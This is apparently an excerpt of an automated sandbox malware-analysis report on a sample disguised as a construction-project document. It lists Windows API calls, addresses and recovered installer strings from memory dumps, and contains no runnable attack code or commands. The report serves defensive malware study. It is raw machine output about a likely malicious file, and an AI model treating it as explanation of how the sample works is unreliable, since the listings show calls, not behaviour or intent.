                                                                                                                          • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004047BA
                                                                                                                            • Part of subcall function 0040574C: GetDlgItemTextW.USER32(?,?,00000400,004047F1), ref: 0040575F
                                                                                                                            • Part of subcall function 00406220: CharNextW.USER32(?,*?|<>/":,00000000,00434000,00436800,00436800,00000000,00403332,00436800,74DF3420,00403542), ref: 00406283
                                                                                                                            • Part of subcall function 00406220: CharNextW.USER32(?,?,?,00000000), ref: 00406292
                                                                                                                            • Part of subcall function 00406220: CharNextW.USER32(?,00434000,00436800,00436800,00000000,00403332,00436800,74DF3420,00403542), ref: 00406297
                                                                                                                            • Part of subcall function 00406220: CharPrevW.USER32(?,?,00436800,00436800,00000000,00403332,00436800,74DF3420,00403542), ref: 004062AA
                                                                                                                          • GetDiskFreeSpaceW.KERNEL32(004206B8,?,?,0000040F,?,004206B8,004206B8,?,00000000,004206B8,?,?,000003FB,?), ref: 0040487C
                                                                                                                          • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404897
                                                                                                                            • Part of subcall function 004049F0: lstrlenW.KERNEL32(004226E8,004226E8,?,%u.%u%s%s,00000005,00000000,00000000,?,?,00000000,?,000000DF,00000000,00000400,?), ref: 00404A91
                                                                                                                            • Part of subcall function 004049F0: wsprintfW.USER32 ref: 00404A9A
                                                                                                                            • Part of subcall function 004049F0: SetDlgItemTextW.USER32(?,004226E8), ref: 00404AAD
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.2942513381.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.2942494567.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000004.00000002.2942546434.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000004.00000002.2942567088.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000004.00000002.2942603725.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                          • String ID: A$&B
                                                                                                                          • API String ID: 2624150263-2586977930
                                                                                                                          APIs
                                                                                                                          • ___free_lconv_mon.LIBCMT ref: 332B7D06
                                                                                                                            • Part of subcall function 332B90BA: _free.LIBCMT ref: 332B90D7
                                                                                                                            • Part of subcall function 332B90BA: _free.LIBCMT ref: 332B90E9
                                                                                                                            • Part of subcall function 332B90BA: _free.LIBCMT ref: 332B90FB
                                                                                                                            • Part of subcall function 332B90BA: _free.LIBCMT ref: 332B910D
                                                                                                                            • Part of subcall function 332B90BA: _free.LIBCMT ref: 332B911F
                                                                                                                            • Part of subcall function 332B90BA: _free.LIBCMT ref: 332B9131
                                                                                                                            • Part of subcall function 332B90BA: _free.LIBCMT ref: 332B9143
                                                                                                                            • Part of subcall function 332B90BA: _free.LIBCMT ref: 332B9155
                                                                                                                            • Part of subcall function 332B90BA: _free.LIBCMT ref: 332B9167
                                                                                                                            • Part of subcall function 332B90BA: _free.LIBCMT ref: 332B9179
                                                                                                                            • Part of subcall function 332B90BA: _free.LIBCMT ref: 332B918B
                                                                                                                            • Part of subcall function 332B90BA: _free.LIBCMT ref: 332B919D
                                                                                                                            • Part of subcall function 332B90BA: _free.LIBCMT ref: 332B91AF
                                                                                                                          • _free.LIBCMT ref: 332B7CFB
                                                                                                                            • Part of subcall function 332B571E: HeapFree.KERNEL32(00000000,00000000,?,332B924F,?,00000000,?,00000000,?,332B9276,?,00000007,?,?,332B7E5A,?), ref: 332B5734
                                                                                                                            • Part of subcall function 332B571E: GetLastError.KERNEL32(?,?,332B924F,?,00000000,?,00000000,?,332B9276,?,00000007,?,?,332B7E5A,?,?), ref: 332B5746
                                                                                                                          • _free.LIBCMT ref: 332B7D1D
                                                                                                                          • _free.LIBCMT ref: 332B7D32
                                                                                                                          • _free.LIBCMT ref: 332B7D3D
                                                                                                                          • _free.LIBCMT ref: 332B7D5F
                                                                                                                          • _free.LIBCMT ref: 332B7D72
                                                                                                                          • _free.LIBCMT ref: 332B7D80
                                                                                                                          • _free.LIBCMT ref: 332B7D8B
                                                                                                                          • _free.LIBCMT ref: 332B7DC3
                                                                                                                          • _free.LIBCMT ref: 332B7DCA
                                                                                                                          • _free.LIBCMT ref: 332B7DE7
                                                                                                                          • _free.LIBCMT ref: 332B7DFF
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.2967656105.00000000332B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 332B0000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.2967631198.00000000332B0000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                          • Associated: 00000004.00000002.2967656105.00000000332C6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_332b0000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 161543041-0
                                                                                                                          APIs
                                                                                                                          • GetTickCount.KERNEL32 ref: 00402DD0
                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,00437800,00000400), ref: 00402DEC
                                                                                                                            • Part of subcall function 00405BF8: GetFileAttributesW.KERNEL32(00000003,00402DFF,00437800,80000000,00000003), ref: 00405BFC
                                                                                                                            • Part of subcall function 00405BF8: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405C1E
                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,00435800,00435800,00437800,00437800,80000000,00000003), ref: 00402E35
                                                                                                                          • GlobalAlloc.KERNEL32(?,00409230), ref: 00402F7C
                                                                                                                          Strings
                                                                                                                          • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402FC5
                                                                                                                          • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403013
                                                                                                                          • Inst, xrefs: 00402EA3
                                                                                                                          • soft, xrefs: 00402EAC
                                                                                                                          • Error launching installer, xrefs: 00402E0C
                                                                                                                          • Null, xrefs: 00402EB5
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.2942513381.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.2942494567.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000004.00000002.2942546434.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000004.00000002.2942567088.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000004.00000002.2942603725.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                                          • String ID: Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                          • API String ID: 2803837635-787788815
                                                                                                                          APIs
                                                                                                                          • GetVersion.KERNEL32(00000000,004216C8,?,0040526B,004216C8,00000000,00000000,00000000), ref: 00406071
                                                                                                                          • GetSystemDirectoryW.KERNEL32(004271A0,00000400), ref: 004060EF
                                                                                                                          • GetWindowsDirectoryW.KERNEL32(004271A0,00000400), ref: 00406102
                                                                                                                          • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 0040613E
                                                                                                                          • SHGetPathFromIDListW.SHELL32(?,004271A0), ref: 0040614C
                                                                                                                          • CoTaskMemFree.OLE32(?), ref: 00406157
                                                                                                                          • lstrcatW.KERNEL32(004271A0,\Microsoft\Internet Explorer\Quick Launch), ref: 0040617B
                                                                                                                          • lstrlenW.KERNEL32(004271A0,00000000,004216C8,?,0040526B,004216C8,00000000,00000000,00000000), ref: 004061D5
                                                                                                                          Strings
                                                                                                                          • \Microsoft\Internet Explorer\Quick Launch, xrefs: 00406175
                                                                                                                          • Software\Microsoft\Windows\CurrentVersion, xrefs: 004060BD
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.2942513381.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.2942494567.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000004.00000002.2942546434.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000004.00000002.2942567088.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000004.00000002.2942603725.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                                                                          • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                          • API String ID: 900638850-730719616
                                                                                                                          APIs
                                                                                                                          • _free.LIBCMT ref: 332B59EA
                                                                                                                            • Part of subcall function 332B571E: HeapFree.KERNEL32(00000000,00000000,?,332B924F,?,00000000,?,00000000,?,332B9276,?,00000007,?,?,332B7E5A,?), ref: 332B5734
                                                                                                                            • Part of subcall function 332B571E: GetLastError.KERNEL32(?,?,332B924F,?,00000000,?,00000000,?,332B9276,?,00000007,?,?,332B7E5A,?,?), ref: 332B5746
                                                                                                                          • _free.LIBCMT ref: 332B59F6
                                                                                                                          • _free.LIBCMT ref: 332B5A01
                                                                                                                          • _free.LIBCMT ref: 332B5A0C
                                                                                                                          • _free.LIBCMT ref: 332B5A17
                                                                                                                          • _free.LIBCMT ref: 332B5A22
                                                                                                                          • _free.LIBCMT ref: 332B5A2D
                                                                                                                          • _free.LIBCMT ref: 332B5A38
                                                                                                                          • _free.LIBCMT ref: 332B5A43
                                                                                                                          • _free.LIBCMT ref: 332B5A51
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.2967656105.00000000332B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 332B0000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.2967631198.00000000332B0000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                          • Associated: 00000004.00000002.2967656105.00000000332C6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_332b0000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 776569668-0
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.2967656105.00000000332B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 332B0000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.2967631198.00000000332B0000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                          • Associated: 00000004.00000002.2967656105.00000000332C6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_332b0000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: DecodePointer
                                                                                                                          • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                                                                                          • API String ID: 3527080286-3064271455
                                                                                                                          APIs
                                                                                                                          • CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 332B1D1B
                                                                                                                          • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,?,00000000,?,?,00000000), ref: 332B1D37
                                                                                                                          • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 332B1D4B
                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 332B1D58
                                                                                                                          • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 332B1D72
                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 332B1D7D
                                                                                                                          • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 332B1D8A
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.2967656105.00000000332B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 332B0000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.2967631198.00000000332B0000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                          • Associated: 00000004.00000002.2967656105.00000000332C6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_332b0000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: File$Delete$CloseCopyCreateHandleReadSize
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1454806937-0
                                                                                                                          APIs
                                                                                                                          • GetWindowLongW.USER32(?,000000EB), ref: 0040421E
                                                                                                                          • GetSysColor.USER32(00000000), ref: 0040423A
                                                                                                                          • SetTextColor.GDI32(?,00000000), ref: 00404246
                                                                                                                          • SetBkMode.GDI32(?,?), ref: 00404252
                                                                                                                          • GetSysColor.USER32(?), ref: 00404265
                                                                                                                          • SetBkColor.GDI32(?,?), ref: 00404275
                                                                                                                          • DeleteObject.GDI32(?), ref: 0040428F
                                                                                                                          • CreateBrushIndirect.GDI32(?), ref: 00404299
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.2942513381.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.2942494567.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000004.00000002.2942546434.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000004.00000002.2942567088.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000004.00000002.2942603725.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2320649405-0
                                                                                                                          APIs
                                                                                                                          • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,332B9C07,?,00000000,?,00000000,00000000), ref: 332B94D4
                                                                                                                          • __fassign.LIBCMT ref: 332B954F
                                                                                                                          • __fassign.LIBCMT ref: 332B956A
                                                                                                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 332B9590
                                                                                                                          • WriteFile.KERNEL32(?,?,00000000,332B9C07,00000000,?,?,?,?,?,?,?,?,?,332B9C07,?), ref: 332B95AF
                                                                                                                          • WriteFile.KERNEL32(?,?,00000001,332B9C07,00000000,?,?,?,?,?,?,?,?,?,332B9C07,?), ref: 332B95E8
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.2967656105.00000000332B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 332B0000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.2967631198.00000000332B0000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                          • Associated: 00000004.00000002.2967656105.00000000332C6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_332b0000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1324828854-0
                                                                                                                          APIs
                                                                                                                          • ReadFile.KERNEL32(?,?,?,?), ref: 004025DB
                                                                                                                          • MultiByteToWideChar.KERNEL32(?,?,?,?,?,00000001), ref: 00402616
                                                                                                                          • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,?,?,?,00000001), ref: 00402639
                                                                                                                          • MultiByteToWideChar.KERNEL32(?,?,?,00000000,?,00000001,?,00000001,?,?,?,?,?,00000001), ref: 0040264F
                                                                                                                            • Part of subcall function 00405C7B: ReadFile.KERNEL32(00409230,00000000,00000000,00000000,00000000,00413E90,0040BE90,0040330C,00409230,00409230,004031FE,00413E90,00004000,?,00000000,?), ref: 00405C8F
                                                                                                                            • Part of subcall function 00405ED3: wsprintfW.USER32 ref: 00405EE0
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.2942513381.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.2942494567.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000004.00000002.2942546434.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000004.00000002.2942567088.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000004.00000002.2942603725.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: File$ByteCharMultiReadWide$Pointerwsprintf
                                                                                                                          • String ID: 9
                                                                                                                          • API String ID: 1149667376-2366072709
                                                                                                                          APIs
                                                                                                                          • _ValidateLocalCookies.LIBCMT ref: 332B339B
                                                                                                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 332B33A3
                                                                                                                          • _ValidateLocalCookies.LIBCMT ref: 332B3431
                                                                                                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 332B345C
                                                                                                                          • _ValidateLocalCookies.LIBCMT ref: 332B34B1
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.2967656105.00000000332B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 332B0000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.2967631198.00000000332B0000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                          • Associated: 00000004.00000002.2967656105.00000000332C6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_332b0000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                          • String ID: csm
                                                                                                                          • API String ID: 1170836740-1018135373
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00405BF8: GetFileAttributesW.KERNEL32(00000003,00402DFF,00437800,80000000,00000003), ref: 00405BFC
                                                                                                                            • Part of subcall function 00405BF8: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405C1E
                                                                                                                          • GlobalAlloc.KERNEL32(?,?), ref: 00402809
                                                                                                                          • CloseHandle.KERNEL32(?), ref: 0040288F
                                                                                                                            • Part of subcall function 0040330F: SetFilePointer.KERNEL32(00000000,00000000,00000000,00402FE7,?), ref: 0040331D
                                                                                                                          • GlobalAlloc.KERNEL32(?,?,00000000,?), ref: 00402825
                                                                                                                          • GlobalFree.KERNEL32(?), ref: 0040285E
                                                                                                                          • WriteFile.KERNEL32(?,00000000,?,?), ref: 00402870
                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 00402877
                                                                                                                            • Part of subcall function 00403062: SetFilePointer.KERNEL32(00409230,00000000,00000000,00000000,00000000,?,?,?,0040300E,000000FF,00000000,00000000,00409230,?), ref: 00403088
                                                                                                                            • Part of subcall function 00403062: WriteFile.KERNEL32(00000000,00413E90,?,000000FF,00000000,00413E90,00004000,00409230,00409230,?,?,00000000,00000000,?,?), ref: 00403115
                                                                                                                          • DeleteFileW.KERNEL32(?), ref: 004028A3
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.2942513381.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.2942494567.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000004.00000002.2942546434.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000004.00000002.2942567088.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000004.00000002.2942603725.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: File$Global$AllocFreePointerWrite$AttributesCloseCreateDeleteHandle
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 64603807-0
                                                                                                                          APIs
                                                                                                                          • lstrlenW.KERNEL32(004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040526C
                                                                                                                          • lstrlenW.KERNEL32(00402D94,004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040527C
                                                                                                                          • lstrcatW.KERNEL32(004216C8,00402D94,00402D94,004216C8,00000000,00000000,00000000), ref: 0040528F
                                                                                                                          • SetWindowTextW.USER32(004216C8,004216C8), ref: 004052A1
                                                                                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004052C7
                                                                                                                          • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004052E1
                                                                                                                          • SendMessageW.USER32(?,00001013,?,00000000), ref: 004052EF
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.2942513381.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.2942494567.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000004.00000002.2942546434.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000004.00000002.2942567088.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000004.00000002.2942603725.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2531174081-0
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 332B9221: _free.LIBCMT ref: 332B924A
                                                                                                                          • _free.LIBCMT ref: 332B92AB
                                                                                                                            • Part of subcall function 332B571E: HeapFree.KERNEL32(00000000,00000000,?,332B924F,?,00000000,?,00000000,?,332B9276,?,00000007,?,?,332B7E5A,?), ref: 332B5734
                                                                                                                            • Part of subcall function 332B571E: GetLastError.KERNEL32(?,?,332B924F,?,00000000,?,00000000,?,332B9276,?,00000007,?,?,332B7E5A,?,?), ref: 332B5746
                                                                                                                          • _free.LIBCMT ref: 332B92B6
                                                                                                                          • _free.LIBCMT ref: 332B92C1
                                                                                                                          • _free.LIBCMT ref: 332B9315
                                                                                                                          • _free.LIBCMT ref: 332B9320
                                                                                                                          • _free.LIBCMT ref: 332B932B
                                                                                                                          • _free.LIBCMT ref: 332B9336
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.2967656105.00000000332B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 332B0000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.2967631198.00000000332B0000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                          • Associated: 00000004.00000002.2967656105.00000000332C6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_332b0000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 776569668-0
                                                                                                                          APIs
                                                                                                                          • DestroyWindow.USER32(?,00000000), ref: 00402D35
                                                                                                                          • GetTickCount.KERNEL32 ref: 00402D53
                                                                                                                          • wsprintfW.USER32 ref: 00402D81
                                                                                                                            • Part of subcall function 00405234: lstrlenW.KERNEL32(004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040526C
                                                                                                                            • Part of subcall function 00405234: lstrlenW.KERNEL32(00402D94,004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040527C
                                                                                                                            • Part of subcall function 00405234: lstrcatW.KERNEL32(004216C8,00402D94,00402D94,004216C8,00000000,00000000,00000000), ref: 0040528F
                                                                                                                            • Part of subcall function 00405234: SetWindowTextW.USER32(004216C8,004216C8), ref: 004052A1
                                                                                                                            • Part of subcall function 00405234: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004052C7
                                                                                                                            • Part of subcall function 00405234: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004052E1
                                                                                                                            • Part of subcall function 00405234: SendMessageW.USER32(?,00001013,?,00000000), ref: 004052EF
                                                                                                                          • CreateDialogParamW.USER32(0000006F,00000000,00402C7F,00000000), ref: 00402DA5
                                                                                                                          • ShowWindow.USER32(00000000,00000005), ref: 00402DB3
                                                                                                                            • Part of subcall function 00402CFE: MulDiv.KERNEL32(?,?,?), ref: 00402D13
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.2942513381.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.2942494567.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000004.00000002.2942546434.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000004.00000002.2942567088.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000004.00000002.2942603725.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                                                                          • String ID: ... %d%%
                                                                                                                          • API String ID: 722711167-2449383134
                                                                                                                          APIs
                                                                                                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404B19
                                                                                                                          • GetMessagePos.USER32 ref: 00404B21
                                                                                                                          • ScreenToClient.USER32(?,?), ref: 00404B3B
                                                                                                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404B4D
                                                                                                                          • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404B73
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.2942513381.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.2942494567.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000004.00000002.2942546434.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000004.00000002.2942567088.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000004.00000002.2942603725.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
